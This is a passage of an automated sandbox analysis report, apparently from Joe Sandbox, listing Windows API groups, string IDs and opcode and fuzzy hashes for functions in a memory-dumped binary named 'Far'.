                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3222323430-0
                                                                                                                                                                      • Opcode ID: e10901d8da24730d9a6dcae14f04b19c64a5431aa625291aaa83292bb47a4f16
                                                                                                                                                                      • Instruction ID: a437eaac51eb0964b8540015b0946f31bda286ce40f1a8f98f1c11a13c3c9ddc
                                                                                                                                                                      • Opcode Fuzzy Hash: e10901d8da24730d9a6dcae14f04b19c64a5431aa625291aaa83292bb47a4f16
                                                                                                                                                                      • Instruction Fuzzy Hash: 14718022A0D65BA2EA10BB91D4646BDA3A5FF84F84FC04035D90E07795FF3CE509A761
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow$CharDrawInvalidateNextRect
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1015379403-0
                                                                                                                                                                      • Opcode ID: d59f2740a5fe165c0eddc8410e8822d8b588f443ea048eb28575c21a964feb3c
                                                                                                                                                                      • Instruction ID: f9529d3f0e4f727afbe4827b93f3acbbae9f0fe30042d4438f75ae5646be18cf
                                                                                                                                                                      • Opcode Fuzzy Hash: d59f2740a5fe165c0eddc8410e8822d8b588f443ea048eb28575c21a964feb3c
                                                                                                                                                                      • Instruction Fuzzy Hash: 6E02F621A0CA4EA5EB60AFA1A4442FDE361FB48F94F944231D96D07BD4EF7CE545E320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215588206-0
                                                                                                                                                                      • Opcode ID: 7b8d426230f90130869ac4ecfd1476709457171c3f18d1dcb63f08911d224d99
                                                                                                                                                                      • Instruction ID: 88deeca96dedcaa0a656565efff90cdb84dce5c64718bf5403c9821415e38d9d
                                                                                                                                                                      • Opcode Fuzzy Hash: 7b8d426230f90130869ac4ecfd1476709457171c3f18d1dcb63f08911d224d99
                                                                                                                                                                      • Instruction Fuzzy Hash: 53517C72E0DB0696EB44ABB4E4581BD73B6FB48B04F908139DA1E83784EF7CE4169354
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseValue$ConnectCreateRegistry
                                                                                                                                                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                      • API String ID: 3314541760-966354055
                                                                                                                                                                      • Opcode ID: bc557d881706c6ff6ef4aeacd9939feac9973b5b174f5d1b9e1911d64322ee81
                                                                                                                                                                      • Instruction ID: 17450fdf768d0502f5369f3695b9251d36488d39529efc65a7537d99aea49af9
                                                                                                                                                                      • Opcode Fuzzy Hash: bc557d881706c6ff6ef4aeacd9939feac9973b5b174f5d1b9e1911d64322ee81
                                                                                                                                                                      • Instruction Fuzzy Hash: CF02CF62B0CA5AA1EB00EFA6D4946ADB774FF88F88B848032DE0D47756EF38D505D750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                      • API String ID: 2640511053-438819550
                                                                                                                                                                      • Opcode ID: 89c6591a61725b5991b200c03595f766883d22820a3cdc23d78391e0e8d51318
                                                                                                                                                                      • Instruction ID: 35c025bc3372232e1a6c86a83ffc6cb90354170a0ba7d8379fe052e45c5c98cc
                                                                                                                                                                      • Opcode Fuzzy Hash: 89c6591a61725b5991b200c03595f766883d22820a3cdc23d78391e0e8d51318
                                                                                                                                                                      • Instruction Fuzzy Hash: DC417C11A0CA4A61EA11BB91A9846B9E395FB40FE4FD05231DDAD47695FF2CE409E320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3218304859-0
                                                                                                                                                                      • Opcode ID: d4abbca996e788d0262d83e2eb69194a048a595961ff3f6d89ed0cc8bf9cf25c
                                                                                                                                                                      • Instruction ID: e7354ac4d1e1ca4c780f09fbc3ba2c61da519984af4bc6e4d66894238a388845
                                                                                                                                                                      • Opcode Fuzzy Hash: d4abbca996e788d0262d83e2eb69194a048a595961ff3f6d89ed0cc8bf9cf25c
                                                                                                                                                                      • Instruction Fuzzy Hash: 70F1E432B0DA4AA6EB10EFA5D4906BDB3B0EB89F88B804131DE5D47B95EF38D005D750
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1255039815-0
                                                                                                                                                                      • Opcode ID: aae9aa80d05344ced36c037d2190bece4b4a1c12275f790b9a8f13c7e355f317
                                                                                                                                                                      • Instruction ID: a289c8afb41e4ab59c8c01fdd9a1290c894778553116de51f8ae33c5424e18d7
                                                                                                                                                                      • Opcode Fuzzy Hash: aae9aa80d05344ced36c037d2190bece4b4a1c12275f790b9a8f13c7e355f317
                                                                                                                                                                      • Instruction Fuzzy Hash: BE61BE22B08656AAEB10EFA1D8445ED77A4FB44F88B944036DE6E57B94FF38E405D330
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2395222682-0
                                                                                                                                                                      • Opcode ID: f0a410f9ade6bb1768793df8ba97a0a6cbcfae41610041dc65aa42a30caf5c41
                                                                                                                                                                      • Instruction ID: 6cb1db71bcbda8c4321c558ab0aa75d390d060366c78634f4f15d035b14987dc
                                                                                                                                                                      • Opcode Fuzzy Hash: f0a410f9ade6bb1768793df8ba97a0a6cbcfae41610041dc65aa42a30caf5c41
                                                                                                                                                                      • Instruction Fuzzy Hash: 4FD17037B08B4A96EB10AFA5D4901ADB3B5FB88F88B904436DE4D47B64EF38D445D360
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 312131281-0
                                                                                                                                                                      • Opcode ID: 36d5d91e429a6625e66358aee4667f118106ac2f50f9b97361d3cdf0ccbccb5b
                                                                                                                                                                      • Instruction ID: c57b3805a4b89b721d99a1b7aafd8d4f35258ffa38bd0d45ebdd7e76aed6eaaf
                                                                                                                                                                      • Opcode Fuzzy Hash: 36d5d91e429a6625e66358aee4667f118106ac2f50f9b97361d3cdf0ccbccb5b
                                                                                                                                                                      • Instruction Fuzzy Hash: B771F932609A8A95EB20DFA5E8846ED7760FB89F94F940032DE4D43B64EF7CD186D710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1737998785-0
                                                                                                                                                                      • Opcode ID: c2ed53e4bf4054b6a44d25e1d3c3cbf9851e75b61d24a28646ffddd4b5def0dd
                                                                                                                                                                      • Instruction ID: b89326568e35b99e1f42b0cfe8fd1a1ef818bff21e4b0e1e28a1c7b78542e41a
                                                                                                                                                                      • Opcode Fuzzy Hash: c2ed53e4bf4054b6a44d25e1d3c3cbf9851e75b61d24a28646ffddd4b5def0dd
                                                                                                                                                                      • Instruction Fuzzy Hash: F0418B62A0C646A6EB04BF92D5A837CB760FF84F85F844435DA4E07352EF7CE0489B61
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                      • Opcode ID: f732af45455d5ddc3bccd090c0596ced67c0eacd6538b1bcdc6f4d687803d08c
                                                                                                                                                                      • Instruction ID: 3c909fa3d5ab0b9f4ff79e11e9275025e1ac3760cc14c2c22918789767c70861
                                                                                                                                                                      • Opcode Fuzzy Hash: f732af45455d5ddc3bccd090c0596ced67c0eacd6538b1bcdc6f4d687803d08c
                                                                                                                                                                      • Instruction Fuzzy Hash: 3551EF92A0D2D666F731A7B16140BBDAFA1FB46FC0FC88074DAC907A46DF09E454A331
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$PerformanceQuery$CounterRectmouse_event$CursorDesktopForegroundFrequencySleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 383626216-0
                                                                                                                                                                      • Opcode ID: e38c60fb0ffe78c3b82c37330e0d499f792121dee8b0809686f0cc8b2a791022
                                                                                                                                                                      • Instruction ID: a2fe384616d88d7b1cc5838a7e56834b43f24c369670aa3b418637026f564a72
                                                                                                                                                                      • Opcode Fuzzy Hash: e38c60fb0ffe78c3b82c37330e0d499f792121dee8b0809686f0cc8b2a791022
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A31C533B092119BE314EFA1D4807EC77A5FB88B08F900235EE0A53A85EF38E945CB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1413079979-0
                                                                                                                                                                      • Opcode ID: 900ad2697ce2ea82fe584a0676bc31a5df0f5fe6db6c8f4ec2f5a0c0bb17d0a6
                                                                                                                                                                      • Instruction ID: 26f1449f663de4485b9666d4d93d55a2422bdfb2c4b3617acb89c0e5b8f1aa65
                                                                                                                                                                      • Opcode Fuzzy Hash: 900ad2697ce2ea82fe584a0676bc31a5df0f5fe6db6c8f4ec2f5a0c0bb17d0a6
                                                                                                                                                                      • Instruction Fuzzy Hash: 0A318C3260DB8996D7609F42E4807AAB3A4FB89F90F94403ADE8D03B18EF3DD445DB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                      • API String ID: 1927845040-438819550
                                                                                                                                                                      • Opcode ID: d505a2bbc2439ca57ac19ca0228fc4a5f6b7f038627f32eaf51b84cee045cf14
                                                                                                                                                                      • Instruction ID: d01aaf35efce51c8acf9023948bff1ece5b2f874f22225fa3d99a398251eb8eb
                                                                                                                                                                      • Opcode Fuzzy Hash: d505a2bbc2439ca57ac19ca0228fc4a5f6b7f038627f32eaf51b84cee045cf14
                                                                                                                                                                      • Instruction Fuzzy Hash: AE51A232A4CB8AA5EB10EBA5E4442EDA7B4FB44B94F940132DE8D07799EF38E505D710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4170576061-0
                                                                                                                                                                      • Opcode ID: e40859ed205d5a67b8b7ab83a2af8bf2a316fdca0d5faf15f367f26f9856b194
                                                                                                                                                                      • Instruction ID: a36c1b81b84d858902494edcf1676dbc60c8835f4555e71241f55407cad1bb33
                                                                                                                                                                      • Opcode Fuzzy Hash: e40859ed205d5a67b8b7ab83a2af8bf2a316fdca0d5faf15f367f26f9856b194
                                                                                                                                                                      • Instruction Fuzzy Hash: 8851D162B0C66A91DA14FBA79418A7DABA0BF89FD4F844531DE5D07386EF3CD4009B90
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177002370.00007FF73D12B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2177152415.00007FF73D135000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_21_2_7ff73d040000_Far.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _handle_error
                                                                                                                                                                      • String ID: !$VUUU$fmod
                                                                                                                                                                      • API String ID: 1757819995-2579133210
                                                                                                                                                                      • Opcode ID: b8410c3f1b88abd648b799c913eeb8fb9721d9563882b3ac93a21b2ebb7bfe42
                                                                                                                                                                      • Instruction ID: 05701e315bf9e37d7a18f69e49eb3e805ec7dd5fa007d47701d85f0638004860
                                                                                                                                                                      • Opcode Fuzzy Hash: b8410c3f1b88abd648b799c913eeb8fb9721d9563882b3ac93a21b2ebb7bfe42
                                                                                                                                                                      • Instruction Fuzzy Hash: 75B10A22A1CFC945D6B39A3450513B6F359AFAA7D0F54C332E94E36B64EF2C94C29700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF73D0832F0
                                                                                                                                                                        • Part of subcall function 00007FF73D07B634: GetCurrentProcess.KERNEL32(00007FF73D07B7A5), ref: 00007FF73D07B661
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000015.00000002.2176177689.00007FF73D041000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF73D040000, based on PE: true
                                                                                                                                                                      • Associated: 00000015.00000002.2175633048.00007FF73D040000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D0F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                      • Associated: 00000015.00000002.2176902194.00007FF73D119000.00000002.00000001.01000000.0000000A.sdmpDownload File
